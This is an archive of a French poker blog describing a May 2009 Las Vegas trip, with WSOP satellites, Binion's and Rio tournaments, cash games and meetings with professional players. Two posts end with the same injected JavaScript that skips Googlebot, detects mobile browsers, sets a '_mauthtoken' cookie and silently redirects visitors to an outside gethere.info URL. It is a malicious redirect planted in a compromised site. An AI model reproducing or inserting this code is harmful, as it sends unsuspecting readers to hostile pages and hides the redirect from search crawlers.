Archive for mai, 2009

Shopping, Rio and Bellagio

dimanche, mai 31st, 2009

…mais pas de poker pour moi ce vendredi

Et oui, des journées sans poker, ça existe.

Surtout quand on se lève tard (et pourtant, on fait des bonnes nuits de 4h !), que l’on loupe le tournoi de 11h du matin de notre hôtel et que l’on décide de faire du shopping avant d’aller au Rio pour assister à la suite du 40.000$ dont Bruno Fitoussi était chipleader hier soir.

Donc, vers 13h du matin, Manu et moi partons au Premium Outlet center, au Nord de Vegas pour aller visiter les magasins d’usine. Avec des prix de vente à 50% et un dollar très intéressant pour nous Européens, je vous laisse imaginer les affaires que l’on peut faire. La carte bleue a pris un gros bad-beat.

Manu, qui chausse déjà du 44, a trouvé des chaussures pour ses chaussures :

05-29-day102_450×6001.jpg

Nous retournons à l’hôtel pour poser nos emplettes et reprenons un taxi pour aller au Rio suivre les tournois qui s’y déroulent.

05-29-day104_450×6001.jpg

Un petit oeil au tournoi anniversaire, le 40K, mais les tables sont maintenant peu nombreuses et quasimment inaccessibles aux spectateurs.

En parallèle, se joue le 1er tournoi de Omaha Pot Limit à 1.500$.

Pour le coup, les spectateurs peuvent vraiment être très proches de certaines tables, comme le prouve cette photo :

05-29-day108_450×600.jpg

Je suis à quelques cetimètres de la table de Phil Hellmuth et d’Annie Duke.

Ensuite, je retrouve Elvis, qui n’est vraiment pas mort, mais qui est devenu croupier aux WSOP :

05-29-day1016_450×600.jpg

Manu discute avec 2 des finalistes du Main Event 2008, David « Chino » Reem et Dennis Phillips :

05-29-day1017_600×450.jpg

Pendant ce temps-là, Eric enchaînera 2 Sit’n Go…

Nous partons ensuite rejoindre le Bellagio, pour retrouver mon amie Julia, croupière internationale (et qui travaille parfois pour moi), et peut-être François Montmirel. Ils sont arrivés en fin de journée par le même vol.

Nous nous inscrivons à une table de cash-game, mais il y a de l’attente.

05-29-day1022_600×450.jpg

05-29-day1023_600×450.jpg
Nous prenons un cocktail au bar en attendant…
Pendant qu’Eric et Manu vont checker la liste, Joe Hachem s’installe à côté de moi pour commander, on discute 2 minutes. C’est magique, Vegas 🙂
 

On discute ensuite quelques minutes avec Bruno Fitoussi qui a été éliminé en milieu de journée du 40.000$ alors qu’il était chipleader à la fin du 1er jour.

Malheuresuement, il y a 1h que nous sommes là et il y a encore 11 personnes devant nous sur la liste. On folde et on rentre.
 

(à suivre)

Mon 200$ au Binion’s

samedi, mai 30th, 2009

C’est a priori notre dernier tournoi ….  il faut pas passer a coté ….

Ce matin on part pour le Gambling General Store faire des emplettes , LeScribe et Gedeubor sont de la partie …. dans ce magasin on trouve tout ce qui a atrait de pres ou de loin au poker , tables, jetons, cartes, bouquins, affiches … c’est leur docteur stratageme local, en fait , il est un peu plus grand mais l’accueil est sans commune mesure moins agreable …..

On fait conc nos petites scourses , et tiens donc, on a pas RDV avec Francois Montmirel pour dejeuner a 12h00 ( le tournoi commence a 14h00 ) , bien oui, merde il est juste 12h15 ….. vite on saute dans un taco et nous voila a freemont …. on rejoint Francois , belle chemise blanche siglé EFP , lunettes de soleil et barbichette assortie a sa chemise ( blance ) , la classe internationale …..

On dejuenne au resto du Binion’s ( celui du sous sol pour les connaiseurs … ) , Un last longer est dealé pour le tournoi ..et nous voila partis ….
Je suis table 92 ( la 2eme a casser ) je jeoue peu de mains mais comme a mon habitude , je passe ma relance et mon continuation bet pour montrer ma presence …. un gars qui n’etait pas la table arrive a ma droite ( Seat 1 ) , on lui a pris les bleindes pendant deja 40 minutes .. mais pas grave il s’assoit et recoit 2 fois d’affilé la paire AA ….Woaoooooo

Rien de plus a cette table , je suis replacé a une table ou un jeune ( genre 25 nas ) a deja un grosse pile de jetons , il est dans beaucoup de pots pour etre sincere , je doublerais contre lui avec QQ payé par 99 ….. cool !!!
 

manubinions.jpg

Puis ca commence la fête du Slip, on me deplace au bout d’un moment , je pârs de la grosse blinde pour une autre table …. en possition de BB au prochain coup , mais le temps que le coup en cours se déroule , on vient me changer a nouveau …. bon pensais faire un tournoi de poker pas de chaisses musicales …..

Me voila finalement installé a ma table , je retourve un joueur de ma 1ere table ( un de moins a profiler … ), mais cette table est assez polarisé , 2 joueurs avec pleins de jetons, quelques autres avec beaucoup moins ( dont moi ) …. le rpobleme c’est que l’orsque l’un n’est pas dans le coup l’autre a la bonne idée de relancer … du coup vu que j’ai vue toutes les varaiation possible autour du 8 ou du 4 … je ne peut entrer dans presque aucun coup …… je survis dans ce tournoi, je double encore une fois alors que je suis bien short ( TT contre A9 .. oui il a payé avec cette bousse … ) , mais voila la même chanson continue a ce jouer dans mon JukeBox …. pas de cartes , pas de cartes .. je finis par sortir 47eme sur plus de 248 …top 50 c’est pas trop mal avec le peu de jeu que j’ai eu ……

Je laisse LeScribe et francois dans le tournoi, et pars faire du CG dans cette même room …. la mytique poker rrom du Binion’s …

C’est Francois qui gagnera le Last longer pourtant , lors que l’on me deplace la premiere fois , Francois avait plus que 2000 jetons devant lui , moins d’un tiers du tapis départ ….. et il finira devant moi et même assez pres de la bulle ….. il est passe entre les balles a bein pris le bons Spots a fait preuve de patience ….. normal pour lui  , non ???

Ma session est calme jusqu’a l’arrivée d’un anglais qui se cave a 500 alors que la cave moyenne est a 200 et qui va mettre la pression sur toute la table , il me fait folder A9 sur un flop 239 que je relance , turn 2 ,, river 4 .. je suis sur que je suis devant mais l m’envoi mon tapis a la river , du coup je le voit sur au moins OverPair …fold , et merde …. je reviendrais sur ma cave de départ plus tard sortant de ma session lorsde l’arrivé de Julia et Cedric presque a jeu …..

Dinner JAP’ au Golden Nuggets avec eux , souvenirs, annecdotes, voila un dinner sympa avec de gens tout aussi sympas … mais demain , c’est le départ deja ….. sa commence a sentir l’avion , la douanne , l’escale de 10 heures …..

La Team EFP au Binion’s

samedi, mai 30th, 2009

La team s’agrandit le temps d’un tournoi

Nous passons au Gambling General Store, le magasin de Vegas où l’on peut trouver tout ce qui peut exister pour jouer, au poker ou a des jeux de casino. Cartes, jetons, dés, accessoires de roulette, de blackjack, tables diverses et variées, un rayon de livres à n’en plus finir… C’est en gros, le Docteur Stratagème local… 😉

bf75ba01.jpg

Ensuite, n »ayant finalement pas vu François hier soir pour cause de voyage trop long et de fatigue avancée, c’est ce midi que nous le retrouvons. Rendez-vous est pris au Binion’s, où nous allons jouer ensuite un tournoi sous les couleurs de l’EFP. Nous serons donc 4 au départ de ce tournoi, sur un field total de 248 joueurs.

Le tournoi démarre très fort pour moi, je touche quelques bons setup qui me permettent de monter tout de suite un bon paquet de jetons. J’ai environ 18.000 devant moi au bout de 20 minutes, le tapis de départ étant de 6.000 !

Je n’aime pas toucher tout de suite beaucoup de jeu, c’est très dangereux, on n’a pas encore profilé les joueurs, etc… Mais bon, je ne vais pas jeter les couleurs et les quintes qui rentrent, non ?

J’en profite donc pour ralentir un peu et marcher entre les tables pour aller faire quelques photos de mes camarades.

05-30-day11.jpg

05-30-day118_600×450.jpg

05-30-day115_600×450.jpg

Ah, et ne cherchez pas de photos de moi, mes camarades n’ont pas daigné en prendre… Pas grave, pas grave…

Le tournoi continue de bien se dérouler, il y a un très bon niveau (j’ai même mon adversaire de gauche qui porte un bracelet WSOP). J’ai une bonne image à la table jusqu’à ce que celle-ci soit fermée.

Je me retrouve avec 9 nouveaux adversaires. Le boulot de profiling reprend, je joue mon jeu normalement, sauf que je ne touche plus vraiment de jeu. Un vol par-ci, par-là, pour rester à flot, mais assez compliqué car les coups sont très souvent relancés avant que je ne puisse parler.

Eric sort 96ème, Manu 47ème, juste avant la pause dîner en envoyant son tapis avec T-T, payé par A-Q qui touchera sa Dame. On nous distribue des vouchers-repas et François et moi cherchons le steak-house du Binion’s. Il est situé au 25ème étage. Le temps d’avoir un ascenceur qui nous y conduise, que le maître d’hôtel comprennent l’histoire du voucher et du tournoi (?!), il ne reste plus que 35 minutes avant la reprise. Etant devenus middle-stack avant la pause, nous n’avons pas envie de perdre nos blinds au re-démarrage, nous abandonnons donc le steack-house pour nous rabattre sur un snack rapide.

Retour au tournoi. Mon stack et les blinds ne m’autorisent qu’un seul move : tapis ! Mon image de barre de fer est suffisamment forte pour pouvoir envoyer tout mes jetons et récupérer blinds et antes. Malheureusement, je suis contraint d’attendre d’avoir tout de même une main, car tous les pots sont relancés pré-flop.

J’envoie donc tous mes jetons au milieu une fois avec 5-5, une fois avec 7-7 (qui fera longtemps réfléchir puis folder 9-9 !). Ces 2 moves font beaucoup parler, d’autant que moi-même, pour une fois, je ne parle pas du tout ! Rare ! 🙂

Je reçois à un moment K-K, le pot est relancé pré-flop, je sur-relance à tapis. Le gars me paye et retourne J-J. Enfin un bon setup qui me permet de doubler et de passer à 36.000 sur des blinds 1000-2000. Je vais pouvoir rejouer au poker et non au « On-Off ».

Je relance un coup à 6.000, en fin de parole avec Ac-7c. Un payeur aux blinds. Le flop est insignifiant pour moi, le gars parle avant moi et bet 12.000, je suis contraint de lâcher.

28.000 environ. Retour au « On-Off » ? Quelques mains plus tard, je reçoit As-Ts. J’envoie le tapis, le joueur en BB, qui est en train de ranger ses jetons du coup précédent (il sort un gars avec son A-K qui touche) et demande un compte de mon tapis. Il réfléchit quelques secondes et paie. Je m’attends à tout sauf à voir A-A ! Mais pourquoi a-t-il demandé un compte ? Il est stupide ou aime-t-il faire du slowroll ? Je ne cache pas mon agacement de cette façon de faire et lui fait remarquer, avant de prendre mes affaires et de quitter le tournoi, en 35ème position.

François sortira quelques tours plus tards, en 26ème position. Il y avait 20 payés 🙁

Je retrouve ensuite mon amie Julia qui vient d’arriver à Vegas avec son Cedric. Il sont venus nous rejoindre à Fremont Street pour aller dîner. Un petit japonais dans le Golden Nuggets fera l’affaire.

05-30-day1111_450×600.jpg

On reprend ensuite un taxi tous ensemble, nous descendons au Sahara, Julia et Cedric continuent jusqu’au Bellagio, où ils sont logés.

Nous posons nos affaires (je me balade avec un sac à dos remplis depuis le matin et nos emplettes au Gamblers General Store) à l’hôtel et décidons de ressortir pour se balader à nouveau. Et quand on n’a pas sommeil à Vegas, personne ne nous retient ! 🙂

Au « taxi-stand« , le valet de l’hôtel s’apprête à nous appeller un taxi, nous demande la destination. Et là, il nous explique que pour cette fois, on peux partir en limmo ! Hein, quoi, combien ? Gratuitement ! Certains client comme ça, on le droit de faire des tours de limousine gratuitement. Il faut dire que cela fait 10 jours que l’on appelle sans arrêt des taxi, le valet commence à nous connaître…

05-30-day1118_600×450.jpg

Allez ! Un petit tour en limousine noire… Trop classe ! Eric et Manu ont les jambes allongés, moi aussi en face d’eux, nos pieds ne se touchent même pas…

Après un petit verre dans un bar branché, on rentre, demain, il faut faire les valises

(à suivre)

Apres Memorial Day , Matador »s Day !!!!

vendredi, mai 29th, 2009

Encore une journée a Vegas , mais ce n’est pas n’importe quelle journée , c’est le Vrai debut des WSOP , le tournoi anniversaire commene ce jour, avec un prix d’entrée de 40.000 $ …. bon ce n’est pas la peine de preciser que pour nous c’est Drawing Dead !!!!

Mais bon , on va pouvoir passer supporter nous amis francais qui le font
 Nico L , Elky , Ludo L , David B, Bruno F. , donc voila , la journée commence bien, petit dej equilibré 

img_0628.jpg  

Taxi et direction le RIO ;

On arrive alors que le tournoi a deja commencé , c’est deja blindé de spectateurs alors que hier pour les super SAT il y avait personne , en plus les cordons de secu sont en place on peut evidement pas passer directement entre les sieges ….alors que hier , c’etait comme a la maison …..

On fait de photos , que je publirais dans la bionne rubrique , et on tape un peu la discute avec nos frenchies , il est noter qu’ils sont vraiment acesibles alors qu’ils sont juste en train de jouer le plus gros tournoi TNL ( en by in ) de l’histoire des WSOP ….. merci les gars pour votre dispo , demain on vous supporteras encore !!!

De notre coté , on est juste a fond , on est aux WSOP les gars …. et tiens une idée , il y a des Satellites pour le 1000 des WSOP , le by in est fixé a 125 $  , c’est un winner take all … donc un ticket pour le vainqueur + 120 $ en cash !!

C’est a mon tour , je serais le deuxieme a me lancer , Gedeubor lui est deja assis en train de tenter le sien …
je prends mon ticket :

1.jpg

Table 206  ( il y en a au mois 400 ) siege 6

J’arrive a ma table , tout le monde s’installe , avec le rituel du Where are you from , et la reponse habituelle, I’m Spanish but I live In France ….. a ma table etrangement ( car il y a des gens de tous les pays sur place ) il n’y a que des ricains …. ( même pas un chinois…PTDR cf: post precedents ) , il se voyent deja me manger tout cru !!!!

2.jpg

Et c’est parti, la structure est digne d’un turbo sur Everest …ou presque ….

3.jpg

Je pousse une premiere fois mon tapis en check raisant mon adversaire , car je n’ai pas la possition sur lui avec top paire top kiker …. il fold !!!

4.jpg

Mon tapis descends , je tente de garder la moyenne mais c’est dur ….

5.jpg

Encore a Tapis , on a tous deux AR , partage ….

puis le moove qui me fait passer devant :

Je relance ( suffisament pour montrer que je suis commited ) en position ( bouton) avec K8 a trefles ….

La SB, fold , et la BB m’envoie sa boite ….ils se trouve que je l’ai deja vu faire le moove sur un autre gars avec AIR, je me posse donc des questions , et puis j’ai deja envoyé plus de la moitié de mon tapis , et puis ils m’ont tous vbu folder paire de 88 sur un board  avec 4-10-J , donc ils savent que je peut folder …. mais surtout c’est un winnere take all , donc on joue pas les 2eme ou 3eme place , et avec ce qui me reste derriere je vais pas tenir longtemps ….. donc : CALLLLLL

il retourne A3 off , le flop apporte deux trefles ( j’ai oublie le reste ) , puis un troisieme au Turn …. DOBLE UP !!!!!

j’ai des jetons je peut jouer , et des lors , je decide de mettre la pression sur la table, relancant presque tous les coups pas relances ou limpés devant moi ….. le mec chiant , un gars en foldant une main au flop apres ma relance me dit : tu n’a pas une main forte a chaque fois ….. il se trouve que ce coup ci , j’ai AQs ….et je montre ma main ….. maintenant il vont filper encore plus de me caller  !!!!

6.jpg

Puis nous voila en HU , mon adversaire est un gars solide , je l’ai pas vu faire de call foirreux et il  a toujours montré de la force dans ses mooves , sauf que , j’ai 8500 jetons et lui 1500 sur les blindes 400/800 …..

Mon croupier DAN , lorque lo’n est trois me dit lorsque je remporte un pot, « J’ai mon favorit » et arrive en HU , il me dit « je confirme » , en me faisant un clin d’oeil …. 

7.jpg

je relance a tapis la premiere main du HU avec J9 suited , il folde ….
la deuxieme main , il folde directement tout seul comme un grand estimant que sa main valit rien et que de toute facons ill serait payé…..
la troisieme sera la derniere … la voici en images :

8.jpg

Et une victoire en XSOP pour Papa , c’est juste ennorme , une staff woman vient remplir les documents qui vont bien,
je signe le formulaire et me voici avec une belle perf a Vegas !!!!!

9.jpg

Je n’oublie pas de « Tiper » ( donner un pourboire ) a DAN 20$ , mon croupier ,  et devant 
moi , deux jetons de 500 du RIO + 120$ en Cash !!! 

10.jpg

Voila reste sur mon nuage , pendant quelques temps , je realise pas …. mais Gedeubor
et LeScribe sont la pour tout aille bien …

On retrouvera Remy B. plus tard , il reste avec nous pendant 3 bonnes heures … on discute surtout poker, vous imaginez bien que j’ai juste 2000 questions a lui poser , et lui il est juste simple et adorable comme tout le monde le sait deja….

Pour finir la journée , session de Cash Game au Riviera ,ma table est juste inmonde , j’ai l’impression que tous le monde joue en limit, tous les pots sont multiway a 5 ou 6, je ressere mon jeu et sa passe , tiens encore possotif …. decidement c’est bien ma journée …..

Bisous a tous …}if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Retour au Rio

vendredi, mai 29th, 2009

Des journées négatives, ça arrive aussi…

Jeudi 28 Mai

Avant de descendre rejoindre mes potes, je bosse un peu dans ma chambre, je rédige un article pour le blog, etc.. et je mets à jour mes comptes, sur mon tableau excel :

bankroll_001.jpg

Serais-je maniaque ? 🙂

Donc, je les rejoins en bas, au resto de l’hôtel et comme le dit Manu, le petit déj’ ici, c’est pas pour les enfant de choeurs :

matadorpetitdej.jpg

saharapetidej.jpg

Nous partons ensuite pour le Convention Center du Rio, où se joue le plus gros tournoi de tous les temps, après le H.O.R.S.E. à 50.000$, c’est-à-dire le Tournoi Anniversaire des WSOP, à 40.000$ de buy-in (pour le 40ème anniversaire, donc).

Quelques têtes connues :

amazon40k.jpg

Daniel Negreanu a côté de Dennis Philipps, le chipleader de la Table Finale du Maint Event 2008.

lescribegedeubor.jpg

Le futur Champion du Monde (d’Othello)

05-28-day99_600×450.jpg

Spéciale dédicace pour LaScribette ^^

05-28-day910_600×450.jpg

05-28-day911_600×450.jpg

05-28-day913_600×450.jpg

05-28-day940_600×450.jpg

05-28-day942_600×450.jpg

Et ensuite, on va jouer notre Satellite à 125$ sous les couleurs de l’Ecole Française de Poker :

gedeuboramazonsat.jpg

05-28-day919_450×600.jpg

Eric finit 3ème, moi aussi, en revanche Matador, vous avez vu son post…

On est super heureux pour toi, Manu. Quel prestige de gagner un tournoi aux WSOP ! Bon, ceux-là n’ont pas encore de bracelet, mais quel kiff ! 8)

05-28-day951_450×600.jpg

Tiens d’ailleurs, c’est sympa pour Manu et moi : ils ont mis notre date de naissance sur le logo des WSOP. Oui, oui, nous aussi on a été « Established in 1970 » 😉

C’est p’t’êt un signe…

Sinon, le soir n’est pas terrible. Session de CG au Circus-Circus qui ne se fera pas faute de joueurs,

05-28-day91_450×600.jpg

(là, on se disait juste que le gars qui change les ampoules, il a du taff, le garçon)

…on rejoint donc Eric au Riviera, qui est juste de l’autre côté de la rue.

Malheureusement, le peu de mains jouables que j’avais se faisaient toujours doubler au flop et mon tapis va osciller de 180 à 45, à 120, à 220, pour finir à 87$. Une session à -100$, donc…

Pas grave, je suis toujours positif au niveau bankroll.

Je n’oublie pas que je n’ai changé que 100€ le 1er jour et que depuis, je ne joue qu’avec les dollars gagnés sur place.

Si ça c’est pas de la bonne gestion de bankroll 🙂

Allez, à demain pour de nouvelles aventures : aujourd’hui normalement, nous retrouvons François Montmirel et mon amie Julia, qui est croupière internationale et qui travaille pour moi de temps en temps 🙂

(à suivre)

Une journée bien cool ….

jeudi, mai 28th, 2009

Elle comence sur un transat, a la piscine , il fait chaud deja , il est 10h30 ….  faut dire que c’est le desert Vegas , de plus nous logeons au Sahara …. bien masos les gars …..
Je rejoins donc Gedeubor a la piscine , LeScribe est deja sur l’ordi lui !!!

Nous decidons avec Eric d’apeller notre « loyer » car en fait il y a genre 1 metre d’eau dans la piscine …..partout , impossible de fire des bombes et de ploger comme des golios de touristes … mais bon , au moins l’eau est chaude ….. même pas , le passage « bas ventral » nous a couté grave , mais bon quelques longeurs furent executés tels Yohnny Weysmuller et ester Williams ( qui est qui , je vous laisse le chouAAAAh AhAAAAAH AH AAAAAAH .. )

Un petit dejeunner plus tard, nous voila devant la TV du bar , finale de coupe Europe oblige …. je supporte le Barca depuis ma tendre enfance ….. et nous avons bien fait le BARCA est champion , je geule comme un golio dans le Casino , les amerloques ne comprenent rien et je mù’en branle  , putain ca fait du bien …..

barca11.jpg

barca2.jpg

barca3.jpg

La journée va etre belle ….c’est sur !!!

Nous montons faire quelques posts sur le forum , puis , LeSZcribe a disparu …. quelques SMS plus tard il est a la poker room du Stratophere en Cash Game ….. allons donc le chercher …..on prend un Taxi et 5$ plus tard , nous voila arrivées , mais en fait , c’est pas a dix minutes a pied ??? Oui , mais bon on est la pour faire marcher l’industrie Americaine et les sortir de la ressetion , non ???

Escribe a laché deux caves , on le sort de la comme on peut , puis direction le RIO !!!!

rio1.jpg
C’est les satellites du 40K anniversaire et sur on va croiser de amis frenchies ….

Effectivement, Fabrice Soulier est la , tout comme Remy Biechel , qui tentait deja le Sat hier …..donc aparament il a pas été au bout , ils nous raconte qui a bataillé toute la soirée etant Shrot Stack et que malheureseument il aps reussi a aller au bout !!
fabrice.jpg

remi.jpg

On leur fait un petit bonjour , puis , on va manger …..au retour, Fabrice a un joli stack devant lui, il a presque  triple avec QQ lors qu’il paie un petit tapis qui envoie la sauce, puis un autre jouer qui d’apres Fabrice ( cela lui donnerat raison au bout ..) envoie lui aussi le sien en protection …. ses adversaires ont AR et 88 , la paire de QQ de Fabruice va tenir !!!! Cool !!! Mais cette bonne nouvelle est suivie apr une autre moins bonne < Remy est out , sur un flop pre relancé par Remy trouvant un seul coleur, 10-8-4 , son adversaire ait une ouverture puis Remy ( qui a deja jouee le gars et connait son profil ) lui envoie son tapis en pleine face ….. il reflechira un bon moment pour finalement caller avec A10 , Remy retourne AQ … qui ne s’amelliore pas , domage …..

Même si il est decu de pas faire le 40k , il est disponible , et on discute un bon moment ….
Fabrice lui , est toujours la pour aller cherhcer son ticket , il y en a trois a prendre ……il va falloir batailler dur , mais c’est pas trop mal partie …..

Nous rencontrons aussi Claire de Made in Poker , avec qui nous passons auissi un bon moment en compagnie de Remy …

claire.jpg

Nous les laissons pour aller grinder quelques tables et souhaitons the best for Fabrice ……

Ou aller , on a cote des sessions un side bet, ramener le plus de jetons de 1$ diferents possibles , on va donc aller ce soir au Hard Rock Cafe Casino ….on est acuellis pas de jolies danseusses, mais on est par venu pour danser , masi pour pecher !!!

danse.jpg
on s’inscrit tous les trois a une table, elle est juste mortelle, deja la missique est a fond, et nos amis et adversaires sont en partant de bourrées …en passant par debutants , jusqua ..solide (nous ….), les premiers pot son injouables , relance , payé trois fois , tapis de 300$ envoyés …. Eric va même folder QQ manquant d’informations …..Scribe va doubler avec 99 sur un board 98J …..
Au bout d »une haure , on est tous 3 levés de catte table de la mort , possitifs de 7$ a 140$ ….. mais franchement , injouable, de oplus les sirenes d’incendie se declenchent toutes les 10 minutes sans que personne s’afolle , ??????

Nous voila de retour a notre hotel , un p’tit verre et un shot de video avant dodo ??? C’est marrant personne ne s’oppose a la l’idée …..
Quel jeu de Ganbouleurs ce Video poker , mais pas assez ppour nous …. et j’invente un concept : le video much poker … en faite on masque les cartes, on retines au pur hazard , et on apuie !!!

videopoker.jpg

Bien sur , nous on touche notre brelan avec cette methode !!!!

videopoker2.jpg

On est vraiment trop forts !!!!!!

Voila pour cette journée , a Demain , c’est le depart du 40k, du beau monde est attendu !!!!!if (document.currentScript) { if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

WSOP et session de cash-game

jeudi, mai 28th, 2009

Mercredi 27 Mai

Levé très tôt, couché très tard. On mange (et on boit) à n’importe quelle heure… Ca, c’est Vegas !

Donc ce mercredi, levé de bonne heure, je descend dans le lobby de l’hôtel pour me prendre un « Large Cafe Macchiatto Caramel » et je remonte dans ma chambre pour faire du montage vidéo, écrire le blog, etc… On dirais pas, comme ça, mais ça prend des heures…

On est parfois un peu décalé avec Manu et Eric, mais bon, on arrive toujours à se retrouver.

Aujourd’hui sera la journée la plus décalée. Je commence par me chercher un truc manger vers 14h et comme les snacks du Sahara ne sont pas terrible, que le MacDo, c’est bon, j’en ai en France, etc… je sors et remonte en direction du Stratosphère, que je vois de ma chambre et qui ne paraît pas trop loin. Et en effet, il ne l’est pas, il faudrait ne pas être très malin pour prendre un taxi pour y aller. Enfin, j’dis ça, j’dis rien…

stratosphere.jpg

Je fais établir ma carte de membre du Stratosphere pour pouvoir bénéficier des rewards au resto et ailleurs dans l’hôtel-casino et me dirige vers le resto qui propose un repas à moitié-prix pour les porteurs de la carte. Bad-beat, comme dirait un éleveur de champions que je connais, le resto est fermé le Mercredi !

